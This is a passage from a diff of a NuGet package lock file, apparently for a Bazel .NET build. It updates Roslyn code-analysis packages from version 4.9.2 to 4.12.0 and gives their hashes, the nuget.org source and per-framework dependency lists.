"Microsoft.CodeAnalysis.Workspaces.Common"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.Workspaces.Common", "id": "Microsoft.CodeAnalysis.Workspaces.Common", "version": "4.9.2", "sha512": "sha512-DieswZYcYVGDPeT6m7M4i+0aKkjSgyjmI9z9HJEDSRZdvXfKYLEKwmlFGUTyzFS4brnyMCwLSiw2KWVAydpzVA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net462": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net47": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net471": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net472": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net48": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.Common", "id": "Microsoft.CodeAnalysis.Common", "version": "4.12.0", "sha512": "sha512-83sYPF0SekVhecApCFXsLCsQL9qFzAl5ieCEqVb8Uo08nV34YD3cfq7FLv6EkhnAwPbP7ky19sAEEqYLDUrxWA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net462": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net47": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net471": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net472": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net48": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net5.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net6.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net7.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netstandard2.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.CSharp", "id": "Microsoft.CodeAnalysis.CSharp", "version": "4.12.0", "sha512": "sha512-Dbb/taxFill9/+2HRJufXW3udAtJaQw3+LzbWTDyYx7Z02HVdU5ydMXXTqg5lFgSmLDNBe+B8jRuI2eYw8OBOA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.CSharp.Workspaces", "id": "Microsoft.CodeAnalysis.CSharp.Workspaces", "version": "4.12.0", "sha512": "sha512-YwFqDAYHJrf02FyGU8nQnaWNryZXuDV0r8pVgWjRtxAFDWfaU5CZxvU/4NsS6GSnEsWp6W/e49QMHsDXTJW/KA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.VisualBasic", "id": "Microsoft.CodeAnalysis.VisualBasic", "version": "4.12.0", "sha512": "sha512-le1vRWFDjf9mYrVwhxw+rNZpRg/AvBi9aK+4zfn47qN2S7XPXtDwdz/dvxVg8bKJMfkwK1WPi2Bvlc7naPdaYg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": 